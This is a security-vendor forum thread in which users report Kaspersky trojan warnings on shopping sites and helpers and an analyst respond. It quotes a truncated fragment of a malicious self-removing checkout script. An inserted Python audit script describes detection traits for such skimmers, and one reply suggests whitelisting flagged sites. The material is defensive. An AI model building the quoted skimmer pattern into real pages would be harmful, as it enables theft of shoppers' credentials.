japselrn1
Posted

Hello 

Every time I visit this webshop, I get a warning message. I have tested the website in the Kaspersky-Tool, where no virus or similar could be found - see attachment.

Why does this message appear (how to fix it?) because the website owner told me that they could not find a virus on their site?

Thank you

 

 

Flood and Flood's wife
Posted

Hello @japselrn1,

Welcome!

What the merchant says may be correct, there is no virus, however, TROJAN-PSW.SCRIPT.GENERIC = Malware of this family steal cookies and website credentials.

  • Log a case with Kaspersky Technical Support, select Malware, Detected threat appears over & over again template - see image1; include all the information you’ve provided here, including images & your research, ask the Kaspersky Lab to let you know if the detection is a false positive; if it’s a legitimate detection, the Lab will provide information to explain to the merchant so they can fix the www.
  • After submitting the case, you’ll receive an automated email with an INC+12digits reference number, then, normally, within 5 business days, a Kaspersky Technical Support human will communicate with you, also by email, you may continue to engage with the Kaspersky Technical Team via email or by updating the INC in your MyKaspersky account.
  • Note, we’ve been able to replicate the detection: see image 2, KIS Report & FF log

 Image 1

Image 2

 

Thank you🙏

Flood🐳

Flood and Flood's wife
Posted

Hello @japselrn1,

Additionally, adding the KIS Report & FF log I mentioned above & another online scan result:

Thank you🙏

Flood🐳

japselrn1
Posted

Awesome, thank you for your help!

Flood and Flood's wife
Posted

Hello @japselrn1,

You’re most welcome😃!

Please share the outcome with the Community when it’s available?

Thank you🙏

Flood🐳

Posted

@japselrn1 Also, the site contains a suspicious .js file; K-Lab will confirm or deny a false positive.

  • 10 months later...
  • 1 year later...
Posted

I had the exact same problem when making a purchase on the muscle and strength website. I didn't quite understand what this trojan is about on this site, could anyone give me some guidance or if I should be worried about my personal data?

Event: Download denied
User: DESKTOP-GUEDONE\ander
User type: Active user
Application name: chrome.exe
Application Path: C:\Program Files\Google\Chrome\Application
Component: Web Anti-Virus
Description result: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic Analysis
Threat Level: High
Object Type: File
Object path.: https://www.muscleandstrength.com/store/checkout/onepage/success
MD5: E058D66C1F5E0ADF8591AACBD20CA51B
Reason: Expert analysis
Database release date: Today, 11/25/2022 11:59:00

Flood and Flood's wife
Posted (edited)
5 hours ago, Guedones said:

I had the exact same problem when making a purchase on the muscle and strength website.

I didn't quite understand what this trojan is about on this site, could anyone give me some guidance or if I should be worried about my personal data?

  • Event: Download denied
  • Description result: Blocked
  • Name: HEUR:Trojan-PSW.Script.Generic
  • Precision: Heuristic Analysis
  • MD5: E058D66C1F5E0ADF8591AACBD20CA51B

Hello @Guedones

Welcome!

  1. (Your) installed Kaspersky software blocked the Download (Download denied). 
  2. TROJAN-PSW.SCRIPT.GENERIC: Malware of this family steal cookies and website credentials
  3. E058D66C1F5E0ADF8591AACBD20CA51B
  4. VT https://www.muscleandstrength.com/store/checkout/onepage/success
  5. Please read & follow: Kaspersky application blocks my website or application. What should I do? & False detections by Kaspersky products. What to do?
  6. We tried to process a txn at the site, however, we could not replicate the error, nor could we successfully complete the txn, the detection may be a false positive *but* the only people qualified to make that assessment are Kaspersky's Virus Lab experts, please log a case with Kaspersky support, on the support page, select either Email or Chat, then fill in Malware, False positive template; support may request logs, traces & other data; they will guide you. 

Please share the outcome with the Community, when it's available? 

Thank you
Flood

Edited by Flood and Flood's wife
Posted
On 11/26/2022 at 3:51 AM, Guedones said:

I had the exact same problem when making a purchase on the muscle and strength website. I didn't quite understand what this trojan is about on this site, could anyone give me some guidance or if I should be worried about my personal data?

Event: Download denied
User: DESKTOP-GUEDONE\ander
User type: Active user
Application name: chrome.exe
Application Path: C:\Program Files\Google\Chrome\Application
Component: Web Anti-Virus
Description result: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic Analysis
Threat Level: High
Object Type: File
Object path.: https://www.muscleandstrength.com/store/checkout/onepage/success
MD5: E058D66C1F5E0ADF8591AACBD20CA51B
Reason: Expert analysis
Database release date: Today, 11/25/2022 11:59:00

Hello, @Guedones

I think this is a false positive; there isn't any malware script in that page. But there are some other reasons that could cause you to encounter this issue. The first is your browser add-ons. The second is that the website sends back special HTML code to you, different from what it sends me. So you can disable all browser add-ons and re-open the browser to check this issue first. If that does not work, please reply back here.

Regards.

  • 1 year later...
Posted
On 11/26/2022 at 2:14 AM, Flood and Flood's wife said:

Hello @Guedones

Welcome!

  1. (Your) installed Kaspersky software blocked the Download (Download denied). 
  2. TROJAN-PSW.SCRIPT.GENERIC: Malware of this family steal cookies and website credentials
  3. E058D66C1F5E0ADF8591AACBD20CA51B
  4. VT https://www.muscleandstrength.com/store/checkout/onepage/success
  5. Please read & follow: Kaspersky application blocks my website or application. What should I do? & False detections by Kaspersky products. What to do?
  6. We tried to process a txn at the site, however, we could not replicate the error, nor could we successfully complete the txn, the detection may be a false positive *but* the only people qualified to make that assessment are Kaspersky's Virus Lab experts, please log a case with Kaspersky support, on the support page, select either Email or Chat, then fill in Malware, False positive template; support may request logs, traces & other data; they will guide you. 

Please share the outcome with the Community, when it's available? 

Thank you
Flood

I know I'm replying to a dead thread, but I just wanted to make sure. Something similar happened, with the same Heuristic. Should I be worried, even though the download was denied? Thanks. I don't really care about the website itself.

And can you also please tell me how to properly visit sites that don't at all look suspicious? Like, if something that hasn't been detected, and heuristics don't work, then there's not much we can do. Or if the virus is more complex and simply stopping the download isn't enough (idrk too much about viruses, just speculating).


I'll still attach the information in case your experts might wanna check it:

Event: Download denied
User: OMNI\rayya
User type: Initiator
Application name: brave.exe
Application path: C:\Program Files\BraveSoftware\Brave-Browser\Application
Component: Safe Browsing
Result description: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic Analysis
Threat level: High
Object type: File
Object path: https://bioshop.pk
MD5 of an object: CE24F0DFFC3409D3DBD07758350909F9
Reason: Expert analysis
Databases release date: Today, 10/25/2024 9:27:00 PM

Posted (edited)
7 hours ago, Ray Jax said:

I know I'm replying to a dead thread, but I just wanted to make sure. Something similar happened, with the same Heuristic. Should I be worried, even though the download was denied? Thanks. I don't really care about the website itself.

And can you also please tell me how to properly visit sites that don't at all look suspicious? Like, if something that hasn't been detected, and heuristics don't work, then there's not much we can do. Or if the virus is more complex and simply stopping the download isn't enough (idrk too much about viruses, just speculating).


I'll still attach the information in case your experts might wanna check it:

Event: Download denied
User: OMNI\rayya
User type: Initiator
Application name: brave.exe
Application path: C:\Program Files\BraveSoftware\Brave-Browser\Application
Component: Safe Browsing
Result description: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic Analysis
Threat level: High
Object type: File
Object path: https://bioshop.pk
MD5 of an object: CE24F0DFFC3409D3DBD07758350909F9
Reason: Expert analysis
Databases release date: Today, 10/25/2024 9:27:00 PM

 

Hello @Ray Jax

Just a thought: if Kaspersky or another security software shows a warning for a website that tests clean on tools like the Kaspersky Virus Removal Tool (KVRT), there are a few possible reasons for the message:

1. Suspicious Content or Ad Scripts

  • Some websites may use ads or third-party scripts that can trigger security warnings, even if the site itself is clean. Kaspersky may detect the scripts as potentially harmful if they track user behavior aggressively or are known to originate from less reputable sources.

2. Outdated SSL/TLS Certificates

  • If the website uses an outdated or incorrectly configured SSL/TLS certificate, Kaspersky may flag it as insecure. Security software prioritizes sites with up-to-date and properly configured certificates.

3. Phishing or Fraudulent Content Flagging

  • Some sites are flagged for potential phishing or suspicious activity based on historical data or user reports, even if the website doesn’t have a virus. Kaspersky maintains databases of URLs reported as suspicious, which could result in the warning.

4. Unusual Redirects or URL Structure

  • Some e-commerce sites use redirects, particularly for user tracking or cross-site functionalities. If a URL has an unusual redirect or URL structure, Kaspersky may flag it as suspicious.

How to Fix or Bypass the Issue

  • Whitelisting: In Kaspersky, you can add this website to your “Trusted URLs” if you are confident that it’s safe. This will bypass future warnings.
  • Report a False Positive: If you believe the site is secure, you or the website owner can report it as a false positive to Kaspersky. They review these submissions and may adjust their databases.
  • Clear Browser Cache: Sometimes, cached data can trigger repeated warnings. Clearing your browser cache or using a private browsing window may help.

If you have further details on the exact warning (for instance, if it mentions phishing or a specific security threat), maybe I can help clarify further.

Thank you

Edited by KarDip
edit code element
Posted
2 hours ago, KarDip said:

 

Hello @Ray Jax

Just a thought: if Kaspersky or another security software shows a warning for a website that tests clean on tools like the Kaspersky Virus Removal Tool (KVRT), there are a few possible reasons for the message:

1. Suspicious Content or Ad Scripts

  • Some websites may use ads or third-party scripts that can trigger security warnings, even if the site itself is clean. Kaspersky may detect the scripts as potentially harmful if they track user behavior aggressively or are known to originate from less reputable sources.

2. Outdated SSL/TLS Certificates

  • If the website uses an outdated or incorrectly configured SSL/TLS certificate, Kaspersky may flag it as insecure. Security software prioritizes sites with up-to-date and properly configured certificates.

3. Phishing or Fraudulent Content Flagging

  • Some sites are flagged for potential phishing or suspicious activity based on historical data or user reports, even if the website doesn’t have a virus. Kaspersky maintains databases of URLs reported as suspicious, which could result in the warning.

4. Unusual Redirects or URL Structure

  • Some e-commerce sites use redirects, particularly for user tracking or cross-site functionalities. If a URL has an unusual redirect or URL structure, Kaspersky may flag it as suspicious.

How to Fix or Bypass the Issue

  • Whitelisting: In Kaspersky, you can add this website to your “Trusted URLs” if you are confident that it’s safe. This will bypass future warnings.
  • Report a False Positive: If you believe the site is secure, you or the website owner can report it as a false positive to Kaspersky. They review these submissions and may adjust their databases.
  • Clear Browser Cache: Sometimes, cached data can trigger repeated warnings. Clearing your browser cache or using a private browsing window may help.

If you have further details on the exact warning (for instance, if it mentions phishing or a specific security threat), maybe I can help clarify further.

Thank you

I just meant to ascertain if there's anything else to do or be worried of, despite the download being blocked by Kaspersky.

harlan4096
Posted
11 hours ago, Ray Jax said:

I'll still attach the information in case your experts might wanna check it:

Event: Download denied
User: OMNI\rayya
User type: Initiator
Application name: brave.exe
Application path: C:\Program Files\BraveSoftware\Brave-Browser\Application
Component: Safe Browsing
Result description: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic Analysis
Threat level: High
Object type: File
Object path:  https:// bioshop . pk
MD5 of an object: CE24F0DFFC3409D3DBD07758350909F9
Reason: Expert analysis
Databases release date: Today, 10/25/2024 9:27:00 PM

Quote

 

Hello,

This is not a false alarm. This site is infected.
Here is the malicious code:

<script id="gli0">if(location.pathname.includes(atob('Y2hl ... ById('gli0').remove()</script>
If you are a webmaster, please remove the above code from the page. Also we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

Sincerely, Malware Analyst
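
For a webmaster reviewing their own pages, the two traits visible in the snippet quoted above (an inline script that removes its own element, and a `location.pathname` test against an `atob`-encoded string) can be searched for with a small audit script. This is an added example, not part of the original posts or any Kaspersky tooling; the `audit` function and the sample HTML are constructed, and a match is a prompt for manual review, not proof of compromise.

```python
import base64
import re
from html.parser import HTMLParser

ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

class InlineScripts(HTMLParser):
    """Collect (id attribute, body) for every inline <script> element."""
    def __init__(self):
        super().__init__()
        self.scripts, self._attrs, self._body = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._attrs, self._body = dict(attrs), []
    def handle_data(self, data):
        if self._attrs is not None:  # only text inside a <script> element
            self._body.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._attrs is not None:
            if "src" not in self._attrs:  # external scripts carry no inline body
                self.scripts.append((self._attrs.get("id"), "".join(self._body)))
            self._attrs = None

def audit(html):
    """Return a finding for each inline script that shows either trait."""
    parser = InlineScripts()
    parser.feed(html)
    parser.close()
    findings = []
    for script_id, body in parser.scripts:
        own = r"getElementById\(\s*['\"]%s['\"]\s*\)\s*\.remove\(" % re.escape(script_id or "")
        removes_itself = bool(script_id) and re.search(own, body) is not None
        path_checks = []
        if "location.pathname" in body:
            for literal in ATOB_RE.findall(body):
                try:
                    raw = base64.b64decode(literal, validate=True)
                    path_checks.append(raw.decode("utf-8", "replace"))
                except ValueError:  # not valid base64, keep the literal for review
                    path_checks.append(literal)
        if removes_itself or path_checks:
            findings.append({"id": script_id, "removes_itself": removes_itself, "path_checks": path_checks})
    return findings

# Constructed sample page: inert, no payload, only the structural traits.
SAMPLE = """<script src="/static/app.js"></script>
<script id="menu">document.getElementById('menu').dataset.ready = '1'</script>
<script id="zz9">if(location.pathname.includes(atob('L2NhcnQ='))){/* inert */}
document.getElementById('zz9').remove()</script>"""

print(audit(SAMPLE))
```

The decoded `path_checks` value shows which page the script was gating on, which tells the site owner where to look first.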

 

 

Posted
10 hours ago, harlan4096 said:

Also we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

This is targeted to the webmaster, right? Since it's talking about modifications to website contents. Anything I should do on my end? Thanks.

harlan4096
Posted

Nothing, just don't visit that site, it's compromised.

Posted

Okay. Thanks. While posting that link here in that message (not even opening the site), the same thing tried to be downloaded (only to be stopped by Kaspersky yet again). It's really odd

Posted
7 hours ago, Ray Jax said:

Okay. Thanks. While posting that link here in that message (not even opening the site), the same thing tried to be downloaded (only to be stopped by Kaspersky yet again). It's really odd

Hello @Ray Jax

No need to worry! Since Kaspersky blocked the download, it successfully prevented any potential threat from affecting your system. Just a few steps to ensure peace of mind:

  1. Delete Any Residual Files: Although Kaspersky blocked the download, checking your downloads folder or temp files for any incomplete or suspicious files is a good habit.

  2. Scan for Potential Threats: Running a quick or full system scan with Kaspersky will confirm that no other parts of this download attempt slipped through.

  3. Keep Kaspersky Updated: Ensure your antivirus definitions and program are fully updated so it continues catching any future threats.

If Kaspersky blocked it right away, your system should be safe, and no further action is needed beyond these checks!

Thank you
